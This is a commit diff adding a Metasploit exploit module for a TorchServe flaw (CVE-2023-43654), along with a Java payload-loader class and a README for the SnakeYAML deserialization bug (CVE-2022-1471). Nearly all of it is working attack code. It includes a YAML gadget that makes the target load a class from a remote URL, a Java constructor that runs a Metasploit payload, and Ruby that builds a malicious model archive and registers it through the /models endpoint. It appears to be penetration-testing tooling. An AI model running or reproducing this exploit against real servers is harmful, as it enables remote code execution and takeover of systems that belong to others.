Initial commit of CVE-2023-43654

external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java

@@ -0,0 +1,72 @@
+// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineFactory;
+import java.io.IOException;
+import java.util.List;
+import metasploit.*;
+
+public class MyScriptEngineFactory implements ScriptEngineFactory {
+    public MyScriptEngineFactory() throws Exception {
+        Payload.main(null);
+    }
+
+    @Override
+    public String getEngineName() {
+        return null;
+    }
+
+    @Override
+    public String getEngineVersion() {
+        return null;
+    }
+
+    @Override
+    public List<String> getExtensions() {
+        return null;
+    }
+
+    @Override
+    public List<String> getMimeTypes() {
+        return null;
+    }
+
+    @Override
+    public List<String> getNames() {
+        return null;
+    }
+
+    @Override
+    public String getLanguageName() {
+        return null;
+    }
+
+    @Override
+    public String getLanguageVersion() {
+        return null;
+    }
+
+    @Override
+    public Object getParameter(String key) {
+        return null;
+    }
+
+    @Override
+    public String getMethodCallSyntax(String obj, String m, String... args) {
+        return null;
+    }
+
+    @Override
+    public String getOutputStatement(String toDisplay) {
+        return null;
+    }
+
+    @Override
+    public String getProgram(String... statements) {
+        return null;
+    }
+
+    @Override
+    public ScriptEngine getScriptEngine() {
+        return null;
+    }
+}

external/source/exploits/CVE-2022-1471/README.md

@@ -0,0 +1,17 @@
+# Overview
+The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
+CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+
+## Compiling
+Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
+
+## Usage
+Trigger the deserialization using the following YAML:
+```yaml
+!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
+```
+
+Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
+contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
+`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
+deliver a Metasploit payload.

modules/exploits/multi/http/torchserver_cve_2023_43654.rb

@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Java
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
+  # prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(_info = {})
+    super(
+      'Name' => '',
+      'Description' => %q{
+
+      },
+      'Author' => [
+        'Spencer McIntyre'
+      ],
+      'References' => [
+        [ 'CVE', '' ],
+      ],
+      'DisclosureDate' => '',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8081
+      },
+      'Targets' => [
+        [
+          'Automatic', {
+            'Platform' => 'java',
+            'Arch' => [ARCH_JAVA]
+          }
+        ],
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
+  end
+
+  def class_name
+    'MyScriptEngineFactory'
+  end
+
+  def constructor_class
+    ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-1471', "#{class_name}.class"))
+  end
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
+
+    if request.relative_resource.end_with?('.mar')
+      send_response(cli, generate_mar, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
+    if request.relative_resource.end_with?('services/javax.script.ScriptEngineFactory')
+      send_response(cli, class_name, {
+        'Content-Type' => 'application/octet-string',
+        'Connection' => 'close',
+        'Pragma' => 'no-cache'
+      })
+      return
+    end
+
+    super(cli, request)
+  end
+
+  def generate_mar
+    mri = Rex::Zip::Archive.new
+    mri.add_file('model.pt', '')
+    mri.add_file('MAR-INF/MANIFEST.json', JSON.generate({
+      'createdOn' => '04/10/2023 16:23:53',
+      'runtime' => 'python',
+      'model' => {
+        'modelName' => @mar_filename.delete_suffix('.mar'),
+        'serializedFile' => 'model.pt',
+        'handler' => 'image_classifier',
+        'modelVersion' => '1.0',
+        'configFile' => 'config.yml'
+      },
+      'archiverVersion' => '0.8.2'
+    }))
+    mri.add_file('config.yml', %( !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["#{get_uri}/"]]]] ))
+    mri.pack
+  end
+
+  def exploit
+    @classloader_uri = start_service
+
+    @mar_filename = rand_text_alphanumeric(rand(8..15)) + '.mar'
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/models',
+      'vars_get' => { # *must* be vars_get and not vars_post!
+        'url' => "#{get_uri}#{@mar_filename}"
+      }
+    })
+    handler
+  end
+end